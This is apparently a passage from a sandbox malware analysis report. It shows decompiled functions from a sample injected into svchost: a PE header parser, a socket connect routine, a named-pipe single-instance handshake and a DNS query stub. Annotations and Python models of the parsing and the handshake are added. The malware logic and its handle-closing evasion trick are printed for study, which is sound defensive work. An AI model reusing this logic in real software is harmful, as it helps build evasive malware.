                                                                                                                                  											_t102 = _v20;
                                                                                                                                  											if(_v8 > _t102) {
                                                                                                                                  												_v8 = _t102;
                                                                                                                                  											}
                                                                                                                                  											_t103 = E0251EBCC(_v8);
                                                                                                                                  											_v16 = _t103;
                                                                                                                                  											if(_t103 == 0) {
                                                                                                                                  												goto L31;
                                                                                                                                  											} else {
                                                                                                                                  												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
                                                                                                                                  												if(_t104 == 0xffffffff) {
                                                                                                                                  													L30:
                                                                                                                                  													_v8 = 0;
                                                                                                                                  													E0251EC2E(_v16);
                                                                                                                                  													_v16 = 0;
                                                                                                                                  												} else {
                                                                                                                                  													_t146 = _v16;
                                                                                                                                  													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
                                                                                                                                  														goto L30;
                                                                                                                                  													} else {
                                                                                                                                  														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
                                                                                                                                  														_v8 = _v20;
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					FindCloseChangeNotification(_v12); // executed
                                                                                                                                  				}
                                                                                                                                  				 *_a8 = _v8;
                                                                                                                                  				return _v16;
                                                                                                                                  			}
0x0251676a, 0x0251676d, 0x02516778, 0x0251677e, 0x0251677e, 0x0251679a, 0x0251679c, 0x025167a2,
0x025167b2, 0x025167b2, 0x025167b8, 0x025167bf, 0x025167bf, 0x025167c9, 0x025167d3, 0x025167d9,
0x025167df, 0x0251696b, 0x0251696b, 0x025167ed, 0x02516801, 0x02516804, 0x02516807, 0x0251680b,
0x00000000, 0x02516811, 0x0251681f, 0x02516824, 0x00000000, 0x0251682a, 0x0251683e, 0x02516842,
0x00000000, 0x02516848, 0x0251685c, 0x02516861, 0x00000000, 0x02516867, 0x02516869, 0x0251686c,
0x02516876, 0x02516878, 0x0251687a, 0x02516881, 0x0251688f, 0x00000000, 0x00000000, 0x02516891,
0x0251689e, 0x025168ba, 0x025168a0, 0x025168b2, 0x025168b2, 0x025168bd, 0x025168c3, 0x025168c5,
0x025168c5, 0x025168c8, 0x025168ce, 0x00000000, 0x00000000, 0x025168d0, 0x00000000, 0x025168ce,
0x025168d2, 0x025168d2, 0x025168d5, 0x025168df, 0x025168e5, 0x025168eb, 0x025168ed, 0x025168ed,
0x025168f3, 0x025168f9, 0x025168fe, 0x00000000, 0x02516900, 0x02516906, 0x0251690b, 0x0251695a,
0x0251695d, 0x02516960, 0x02516966, 0x0251690d, 0x0251690d, 0x02516920, 0x00000000, 0x02516922,
0x0251694f, 0x02516955, 0x02516955, 0x02516920, 0x0251690b, 0x025168fe, 0x025168df, 0x02516861,
0x02516842, 0x02516824, 0x0251680b, 0x02516971, 0x02516971, 0x0251697f, 0x02516986

                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0251677E
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0251679A
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 025167B0
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 025167BF
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 025167D3
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000040,02518244,00000000,?,761B43E0,00000000), ref: 02516807
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251681F
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0251683E
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0251685C
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000028,02518244,00000000,?,761B43E0,00000000), ref: 0251688B
                                                                                                                                  • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,761B43E0,00000000), ref: 02516906
                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,02518244,00000000,?,761B43E0,00000000), ref: 0251691C
                                                                                                                                  • FindCloseChangeNotification.KERNEL32(000000FF,?,761B43E0,00000000), ref: 02516971
                                                                                                                                    • Part of subcall function 0251EC2E: GetProcessHeap.KERNEL32(00000000,0251EA27,00000000,0251EA27,00000000), ref: 0251EC41
                                                                                                                                    • Part of subcall function 0251EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0251EC48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1400801100-0
                                                                                                                                  • Opcode ID: e4cceb5c0d82371220f4e758d583077034de376c396091e7a9a5d5cea4ba97a4
                                                                                                                                  • Instruction ID: da00143cb86416de5b2661fe0a4f5ef79ef296cc66543fc35c01ba4bb165c7dc
                                                                                                                                  • Opcode Fuzzy Hash: e4cceb5c0d82371220f4e758d583077034de376c396091e7a9a5d5cea4ba97a4
                                                                                                                                  • Instruction Fuzzy Hash: 4A711671D0021EEFEF159FA4CC80AEEBBB9FB04314F10456AE915A6190E7309E56DF64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
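The API sequence recorded above (refs 0251677E to 02516971) is a PE header walk: the file is flipped to FILE_ATTRIBUTE_NORMAL (0x80) so it can be opened with GENERIC_READ (0x80000000) and OPEN_EXISTING (3), set back to FILE_ATTRIBUTE_HIDDEN (0x02), sized, and then read in three fixed pieces: 0x40 bytes (sizeof IMAGE_DOS_HEADER), a seek followed by 0xF8 bytes (sizeof IMAGE_NT_HEADERS32, 4 + 20 + 224), and 0x28 bytes (sizeof IMAGE_SECTION_HEADER). The handle is released through FindCloseChangeNotification, which ends in NtClose and so works as a CloseHandle that import-based heuristics do not flag. The Python below is an added example that reproduces the same walk on a constructed PE32 image so the offsets can be checked; it is not code from the report or from the sample, and the sample image, the field names and the rva_to_file_offset helper are the example's own.

```python
import struct

DOS_HEADER_SIZE = 0x40       # first ReadFile length in the dump: IMAGE_DOS_HEADER
NT_HEADERS32_SIZE = 0xF8     # second ReadFile length: 4 + 20 + 224 = IMAGE_NT_HEADERS32
SECTION_HEADER_SIZE = 0x28   # third ReadFile length: IMAGE_SECTION_HEADER
PE32_MAGIC = 0x10B


def parse_pe_headers(data: bytes) -> dict:
    """Walk the headers with the same three read sizes the dumped function uses.
    Raises ValueError wherever one of its ReadFile calls would come up short."""
    if len(data) < DOS_HEADER_SIZE or data[:2] != b"MZ":
        raise ValueError("no DOS header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    nt = data[e_lfanew:e_lfanew + NT_HEADERS32_SIZE]
    if len(nt) != NT_HEADERS32_SIZE or nt[:4] != b"PE\0\0":
        raise ValueError("no NT headers at e_lfanew")
    # IMAGE_FILE_HEADER (20 bytes) follows the 4-byte signature
    machine, nsec, _ts, _symp, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", nt, 4)
    magic = struct.unpack_from("<H", nt, 24)[0]
    if magic != PE32_MAGIC:
        raise ValueError("not PE32; a 0xF8-byte read only covers IMAGE_NT_HEADERS32")
    entry = struct.unpack_from("<I", nt, 24 + 16)[0]       # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", nt, 24 + 28)[0]  # ImageBase (PE32 layout)
    # section table starts right after the optional header, one 0x28-byte entry each
    off = e_lfanew + 4 + 20 + opt_size
    sections = []
    for _ in range(nsec):
        sh = data[off:off + SECTION_HEADER_SIZE]
        if len(sh) != SECTION_HEADER_SIZE:
            raise ValueError("section table truncated")
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", sh, 0)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "virtual_address": va,
            "raw_size": rawsize, "raw_pointer": rawptr,
            "characteristics": struct.unpack_from("<I", sh, 36)[0],
        })
        off += SECTION_HEADER_SIZE
    return {"machine": machine, "characteristics": chars, "num_sections": nsec,
            "entry_point": entry, "image_base": image_base, "sections": sections}


def rva_to_file_offset(hdr: dict, rva: int) -> int:
    """Map an RVA (e.g. the entry point) to a file offset via the section table."""
    for s in hdr["sections"]:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return rva - s["virtual_address"] + s["raw_pointer"]
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def build_sample_pe() -> bytes:
    """Constructed, headers-only PE32 image for the demo (not the analysed sample)."""
    dos = bytearray(b"MZ" + b"\0" * (DOS_HEADER_SIZE - 2))
    struct.pack_into("<I", dos, 0x3C, DOS_HEADER_SIZE)         # e_lfanew = 0x40
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)                    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                  # ImageBase
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    data = struct.pack("<8sIIIIIIHHI", b".data", 0x100, 0x2000, 0x200, 0x600, 0, 0, 0, 0, 0xC0000040)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + text + data


if __name__ == "__main__":
    hdr = parse_pe_headers(build_sample_pe())
    print(hdr["num_sections"], hex(hdr["entry_point"]),
          hex(rva_to_file_offset(hdr, hdr["entry_point"])))
```

The dump shows a single 0x28-byte read; looping over NumberOfSections is the example's generalisation. A PE32+ file would need a 0x108-byte second read, which is why the parser refuses anything but the 0x10B magic.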

                                                                                                                                  Control-flow Graph

                                                                                                                                   Basic blocks of the function at 0251F315 (graph rendered as text; the Executed/Not Executed colouring is not recoverable). Format is block: calls → successors:
                                                                                                                                   • 251f315-251f332 → 251f334-251f336 | 251f33b-251f372
                                                                                                                                   • 251f334-251f336 → 251f424-251f427
                                                                                                                                   • 251f33b-251f372: call 251ee2a, htons, socket → 251f382-251f39b | 251f374-251f37d
                                                                                                                                   • 251f374-251f37d: closesocket → 251f424-251f427
                                                                                                                                   • 251f382-251f39b: ioctlsocket → 251f3aa-251f3f0 | 251f39d
                                                                                                                                   • 251f39d → 251f39f-251f3a8
                                                                                                                                   • 251f39f-251f3a8: closesocket → 251f423
                                                                                                                                   • 251f3aa-251f3f0: connect, select → 251f421 | 251f3f2-251f401
                                                                                                                                   • 251f3f2-251f401: __WSAFDIsSet → 251f39f-251f3a8 | 251f403-251f416
                                                                                                                                   • 251f403-251f416: ioctlsocket, call 251f26d → 251f41b-251f41f
                                                                                                                                   • 251f41b-251f41f → 251f423; 251f421 → 251f423; 251f423 → 251f424-251f427 (common exit)
                                                                                                                                   The call order socket, ioctlsocket, connect, select, __WSAFDIsSet, ioctlsocket is the non-blocking connect-with-timeout idiom (socket switched to non-blocking, connect issued, select waits for writability, then the socket is switched back); any failure path closes the socket.
                                                                                                                                  APIs
                                                                                                                                  • htons.WS2_32(0251CA1D), ref: 0251F34D
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 0251F367
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0251F375
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesockethtonssocket
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 311057483-2401304539
                                                                                                                                  • Opcode ID: 6a46f51e57ecb510e4e1ebe57eb4700f90909448c582d86addc240129932664f
                                                                                                                                  • Instruction ID: 7bf7bb4a0a74d44bbf8b8e0c5136ce26469de4aebc0b1c75a010a14ccf65aa90
                                                                                                                                  • Opcode Fuzzy Hash: 6a46f51e57ecb510e4e1ebe57eb4700f90909448c582d86addc240129932664f
                                                                                                                                  • Instruction Fuzzy Hash: C9318F72941219AFEB10DFA4EC85DEE7BBCFF89310F104566F915D3180E7709A458BA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                   Basic blocks of the function at 0251405E (graph rendered as text; the Executed/Not Executed colouring is not recoverable). Format is block: calls → successors:
                                                                                                                                   • 251405e-251407b: CreateEventA → 2514084-25140a8 | 251407d-2514081
                                                                                                                                   • 2514084-25140a8: call 2513ecd, call 2514000 → 2514130-251413e | 25140ae-25140be
                                                                                                                                   • 25140ae-25140be: call 251ee2a → 2514130-251413e | 25140c0-25140f1
                                                                                                                                   • 25140c0-25140f1: call 251eca5, call 2513f18, call 2513f8c → 25140f3-25140ff | 2514127-251412a
                                                                                                                                   • 25140f3-25140ff → 2514127-251412a | 2514101-2514121
                                                                                                                                   • 2514101-2514121: call 2513f18, ExitProcess
                                                                                                                                   • 2514127-251412a: CloseHandle → 2514130-251413e
                                                                                                                                   • 2514130-251413e: call 251ee2a → 251413f-2514165
                                                                                                                                   • 251413f-2514165: call 2513ecd, CreateNamedPipeA → 2514167-2514174 | 2514188-2514193
                                                                                                                                   • 2514167-2514174: Sleep → 251413f-2514165 | 2514176-2514182
                                                                                                                                   • 2514176-2514182: CloseHandle → 2514188-2514193
                                                                                                                                   • 2514188-2514193: ConnectNamedPipe → 2514195-25141a5 | 25141ab-25141c0
                                                                                                                                   • 2514195-25141a5: GetLastError → 25141ab-25141c0 | 251425e-2514265
                                                                                                                                   • 25141ab-25141c0: call 2513f8c → 2514188-2514193 | 25141c2-25141f2
                                                                                                                                   • 25141c2-25141f2: call 2513f18, call 2513f8c → 251425e-2514265 | 25141f4-2514200
                                                                                                                                   • 25141f4-2514200 → 251425e-2514265 | 2514202-2514215
                                                                                                                                   • 2514202-2514215: call 2513f8c → 251425e-2514265 | 2514217-251421b
                                                                                                                                   • 2514217-251421b → 251425e-2514265 | 251421d-2514230
                                                                                                                                   • 251421d-2514230: call 2513f8c → 251425e-2514265 | 2514232-2514236
                                                                                                                                   • 2514232-2514236 → 2514188-2514193 | 251423c-2514251
                                                                                                                                   • 251423c-2514251: call 2513f18 → 2514253-2514259 | 251426a-2514276
                                                                                                                                   • 2514253-2514259 → 2514188-2514193
                                                                                                                                   • 251425e-2514265: DisconnectNamedPipe → 2514188-2514193
                                                                                                                                   • 251426a-2514276: CloseHandle ×2, call 251e318 → 251427b
                                                                                                                                   • 251427b → 251427b (self-loop)
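The function decompiled below behaves as a single-instance check over a named pipe. A new process first tries to open the pipe (E02514000); if that works it writes a 32-bit value, expects back v + (v >> 2), answers with the same transform applied to the reply, and calls ExitProcess(0). If no instance answers correctly it creates the pipe itself (up to ten CreateNamedPipeA attempts 500 ms apart), serves that exchange to later instances, and after a good handshake reads an 8-byte header whose second dword must be 0xc followed by a 12-byte body. The Python below is an added model of that exchange, not code from the report or from the sample: the pipe name (E02513ECD), the challenge source (E0251ECA5) and the write/read helpers (E02513F18/E02513F8C) are unknown, so an in-memory channel, os.urandom and fixed-length reads with a timeout stand in for them, and the server-side `reply_fn` hook is the example's own, there to show what the check rejects.

```python
import os
import queue
import struct
import threading

MASK32 = 0xFFFFFFFF
CMD_HEADER_LEN = 8      # the 8-byte read into _v28 / _v24 in the decompilation
CMD_BODY_LEN = 0x0C     # _v24 must equal 0xc; the body read into _v40 is 0xc bytes


def expected_reply(v: int) -> int:
    """The transform used on both sides: v + (v >> 2), wrapping like unsigned int."""
    return (v + (v >> 2)) & MASK32


def pack_u32(v: int) -> bytes:
    return struct.pack("<I", v & MASK32)


def unpack_u32(b: bytes) -> int:
    return struct.unpack("<I", b)[0]


class PipeEnd:
    """One end of an in-memory duplex pipe standing in for the named pipe.
    Each write is delivered whole; a read that gets nothing within `timeout`
    seconds, or the wrong length, returns b"" (a failed or timed-out ReadFile)."""

    def __init__(self, tx, rx, timeout):
        self._tx, self._rx, self._timeout = tx, rx, timeout

    def write(self, data: bytes) -> None:
        self._tx.put(bytes(data))

    def read(self, n: int) -> bytes:
        try:
            data = self._rx.get(timeout=self._timeout)
        except queue.Empty:
            return b""
        return data if len(data) == n else b""


def make_pipe(timeout=1.0):
    """Return (client_end, server_end) of a fresh in-memory pipe."""
    c2s, s2c = queue.Queue(), queue.Queue()
    return PipeEnd(c2s, s2c, timeout), PipeEnd(s2c, c2s, timeout)


def client_handshake(end, challenge=None) -> bool:
    """Path taken when the pipe could be opened: send a 32-bit challenge, check
    the reply, acknowledge. True: a live instance answered (the dump then calls
    ExitProcess(0)). False: the dump closes the handle and becomes the server."""
    if challenge is None:
        challenge = unpack_u32(os.urandom(4))     # stand-in for E0251ECA5
    end.write(pack_u32(challenge))
    reply = end.read(4)
    if not reply or unpack_u32(reply) != expected_reply(challenge):
        return False
    end.write(pack_u32(expected_reply(unpack_u32(reply))))
    return True


def server_handshake(end, reply_fn=expected_reply) -> bool:
    """Listener path after ConnectNamedPipe: answer the challenge, then require
    the peer's acknowledgement to be the same transform of our reply. `reply_fn`
    lets a test play a process that squats the pipe name without knowing it."""
    data = end.read(4)
    if not data:
        return False
    reply = reply_fn(unpack_u32(data)) & MASK32
    end.write(pack_u32(reply))
    ack = end.read(4)
    return bool(ack) and unpack_u32(ack) == expected_reply(reply)


def read_command(end):
    """Frame the listener reads after a good handshake: an 8-byte header whose
    second dword must be 0x0C, then a 12-byte body. None where the decompiled
    code would fall through to DisconnectNamedPipe."""
    hdr = end.read(CMD_HEADER_LEN)
    if not hdr:
        return None
    first, length = struct.unpack("<II", hdr)
    if length != CMD_BODY_LEN:
        return None
    body = end.read(CMD_BODY_LEN)
    return (first, body) if body else None


def run_exchange(challenge=None, reply_fn=expected_reply, timeout=1.0) -> dict:
    """Run both ends on their own threads and return each side's verdict."""
    client, server = make_pipe(timeout)
    verdict = {}

    def serve():
        verdict["server"] = server_handshake(server, reply_fn)

    t = threading.Thread(target=serve)
    t.start()
    verdict["client"] = client_handshake(client, challenge)
    t.join()
    return verdict


if __name__ == "__main__":
    print(run_exchange(challenge=0x12345678))
    print(run_exchange(challenge=0x12345678, reply_fn=lambda c: c, timeout=0.2))
```

The "secret" in this exchange is only the fixed transform, so once the name produced by E02513ECD is known a dummy listener that answers v + (v >> 2) makes a freshly started copy take the ExitProcess(0) path before it installs anything; conversely a process squatting the name without the transform is treated as no peer and the malware simply retries CreateNamedPipeA.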
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0251405E(void* __ecx) {
                                                                                                                                  				unsigned int _v8;
                                                                                                                                  				unsigned int _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				char _v40;
                                                                                                                                  				void* _t40;
                                                                                                                                  				void* _t43;
                                                                                                                                  				void* _t46;
                                                                                                                                  				int _t47;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t56;
                                                                                                                                  				void* _t62;
                                                                                                                                  				void* _t64;
                                                                                                                                  				long _t71;
                                                                                                                                  				void* _t82;
                                                                                                                                  				void* _t92;
                                                                                                                                  				void* _t93;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t97;
                                                                                                                                  				void* _t98;
                                                                                                                                  				void* _t99;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t104;
                                                                                                                                  
                                                                                                                                  				_t95 = __ecx;
                                                                                                                                  				_v8 = 0;
                                                                                                                                   				_t40 = CreateEventA(0, 1, 1, 0); // manual-reset event, initially signaled; passed to the E02513F18/E02513F8C I/O helpers below
                                                                                                                                  				_v16 = _t40;
                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                   					_t43 = E02514000(E02513ECD(_t95),  &_v20); // E02513ECD yields the pipe name (same value feeds CreateNamedPipeA below); E02514000 presumably opens an existing instance into _v20 (0xffffffff = none)
                                                                                                                                  					_t97 = _t98;
                                                                                                                                  					_t102 = 0x7d0;
                                                                                                                                  					_t92 = 0x100;
                                                                                                                                  					_t99 = 0x25222f8;
                                                                                                                                  					if(_t43 == 0) {
                                                                                                                                  						L10:
                                                                                                                                  						E0251EE2A(_t97, _t99, 0, _t92);
                                                                                                                                  						_t104 = _t103 + 0xc;
                                                                                                                                  						_t93 = 0xa;
                                                                                                                                  						while(1) {
                                                                                                                                  							_t93 = _t93 - 1;
                                                                                                                                   							_t46 = CreateNamedPipeA(E02513ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0); // executed; PIPE_ACCESS_DUPLEX | FILE_FLAG_OVERLAPPED, byte mode, 255 instances, 100-byte in/out buffers, 100 ms default timeout
                                                                                                                                  							_t99 = _t46;
                                                                                                                                   							if(_t99 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                   							Sleep(0x1f4); // 500 ms between the ten CreateNamedPipeA attempts (_t93 counts down from 0xa)
                                                                                                                                  							if(_t93 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							CloseHandle(_v16);
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  						while(1) {
                                                                                                                                  							L14:
                                                                                                                                  							_t47 = ConnectNamedPipe(_t99, 0); // executed
                                                                                                                                  							if(_t47 != 0) {
                                                                                                                                  								goto L16;
                                                                                                                                  							}
                                                                                                                                  							L15:
                                                                                                                                  							_t71 = GetLastError();
                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                   							if( ~(_t71 - 0x217) + 1 == 0) { // 0x217 = ERROR_PIPE_CONNECTED (535): a client attached between CreateNamedPipeA and ConnectNamedPipe
                                                                                                                                  								L25:
                                                                                                                                  								DisconnectNamedPipe(_t99);
                                                                                                                                  								continue;
                                                                                                                                  								do {
                                                                                                                                  									while(1) {
                                                                                                                                  										L14:
                                                                                                                                  										_t47 = ConnectNamedPipe(_t99, 0); // executed
                                                                                                                                  										if(_t47 != 0) {
                                                                                                                                  											goto L16;
                                                                                                                                  										}
                                                                                                                                  										goto L15;
                                                                                                                                  									}
                                                                                                                                  									L22:
                                                                                                                                  								} while (_v28 != 1);
                                                                                                                                  								E02513F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                                                                  								_t103 = _t104 + 0x14;
                                                                                                                                  								if(_v32 == 0) {
                                                                                                                                  									_t102 = CloseHandle;
                                                                                                                                  									CloseHandle(_t99);
                                                                                                                                  									CloseHandle(_t92);
                                                                                                                                  									E0251E318();
                                                                                                                                  									L8:
                                                                                                                                  									ExitProcess(0);
                                                                                                                                  								}
                                                                                                                                  								 *0x252215a =  *0x252215a + 1;
                                                                                                                                  								do {
                                                                                                                                  									L14:
                                                                                                                                  									_t47 = ConnectNamedPipe(_t99, 0); // executed
                                                                                                                                  									if(_t47 != 0) {
                                                                                                                                  										goto L16;
                                                                                                                                  									}
                                                                                                                                  									goto L15;
                                                                                                                                  								} while (_t49 == 0);
                                                                                                                                  								_t92 = _v16;
                                                                                                                                   								_v8 = (_v12 >> 2) + _v12; // reply to the peer's 32-bit challenge: v + (v >> 2)
                                                                                                                                  								E02513F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                                                                  								_t56 = E02513F8C(_t99,  &_v12, 4, _t92, _t102);
                                                                                                                                  								_t104 = _t104 + 0x28;
                                                                                                                                   								if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) { // peer must acknowledge with the same transform applied to the reply
                                                                                                                                  									goto L25;
                                                                                                                                  								} else {
                                                                                                                                  									_t62 = E02513F8C(_t99,  &_v28, 8, _t92, _t102);
                                                                                                                                  									_t104 = _t104 + 0x14;
                                                                                                                                   									if(_t62 == 0 || _v24 != 0xc) { // second dword of the 8-byte header must be 0xc, the size of the body read next
                                                                                                                                  										goto L25;
                                                                                                                                  									} else {
                                                                                                                                  										_t64 = E02513F8C(_t99,  &_v40, 0xc, _t92, _t102);
                                                                                                                                  										_t104 = _t104 + 0x14;
                                                                                                                                  										if(_t64 == 0) {
                                                                                                                                  											goto L25;
                                                                                                                                  										}
                                                                                                                                  										goto L22;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L16:
                                                                                                                                  							_t49 = E02513F8C(_t99,  &_v12, 4, _v16, _t102);
                                                                                                                                  							_t104 = _t104 + 0x14;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                   					E0251EE2A(_t97, 0x25222f8, 0, 0x100); // (buffer, 0, 0x100): clears a 256-byte buffer at 0x25222f8, memset-like
                                                                                                                                  					_t103 = _t103 + 0xc;
                                                                                                                                  					if(_v20 == 0xffffffff) {
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					_v12 = E0251ECA5();
                                                                                                                                  					E02513F18(_v20,  &_v12, 4, _v16, 0x7d0);
                                                                                                                                  					_t82 = E02513F8C(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                                                                  					_t103 = _t103 + 0x28;
                                                                                                                                  					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
                                                                                                                                  						CloseHandle(_v20);
                                                                                                                                  						goto L10;
                                                                                                                                  					} else {
                                                                                                                                  						_v8 = _v8 + (_v8 >> 2);
                                                                                                                                  						E02513F18(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                                                                  						_t103 = _t103 + 0x14;
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}
                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02514070
                                                                                                                                  • ExitProcess.KERNEL32 ref: 02514121
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404124870-0
                                                                                                                                  • Opcode ID: 899eb82b1b5377c60112b2498042b9d5d73dff81a035bb9bb2e7769f26f4c2ec
                                                                                                                                  • Instruction ID: 22833779bfc287bbd5fbd402600bf1b69e0002d0e5067e79e887ff9f676f1fca
                                                                                                                                  • Opcode Fuzzy Hash: 899eb82b1b5377c60112b2498042b9d5d73dff81a035bb9bb2e7769f26f4c2ec
                                                                                                                                  • Instruction Fuzzy Hash: CF518FB1D8021ABBFB20AAA0DC45FBF7A7DFB55714F000465FA10B60C0E7358A45DB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1234 2512d21-2512d44 GetModuleHandleA 1235 2512d46-2512d52 LoadLibraryA 1234->1235 1236 2512d5b-2512d69 GetProcAddress 1234->1236 1235->1236 1237 2512d54-2512d56 1235->1237 1236->1237 1238 2512d6b-2512d7b DnsQuery_A 1236->1238 1239 2512dee-2512df1 1237->1239 1238->1237 1240 2512d7d-2512d88 1238->1240 1241 2512deb 1240->1241 1242 2512d8a-2512d8b 1240->1242 1241->1239 1243 2512d90-2512d95 1242->1243 1244 2512de2-2512de8 1243->1244 1245 2512d97-2512daa GetProcessHeap HeapAlloc 1243->1245 1244->1243 1246 2512dea 1244->1246 1245->1246 1247 2512dac-2512dd9 call 251ee2a lstrcpynA 1245->1247 1246->1241 1250 2512de0 1247->1250 1251 2512ddb-2512dde 1247->1251 1250->1244 1251->1244
                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E02512D21(intOrPtr _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				char _v28;
                                                                                                                                  				struct HINSTANCE__* _t19;
                                                                                                                                  				_Unknown_base(*)()* _t20;
                                                                                                                                  				void* _t22;
                                                                                                                                  				long* _t30;
                                                                                                                                  				intOrPtr* _t37;
                                                                                                                                  				long _t39;
                                                                                                                                  				long _t40;
                                                                                                                                  				void* _t41;
                                                                                                                                  
                                                                                                                                  				asm("movsd");
                                                                                                                                  				asm("movsd");
                                                                                                                                  				asm("movsw");
                                                                                                                                  				asm("movsb");
                                                                                                                                  				_t19 = GetModuleHandleA( &_v28);
                                                                                                                                  				_t39 = 0;
                                                                                                                                  				if(_t19 != 0) {
                                                                                                                                  					L3:
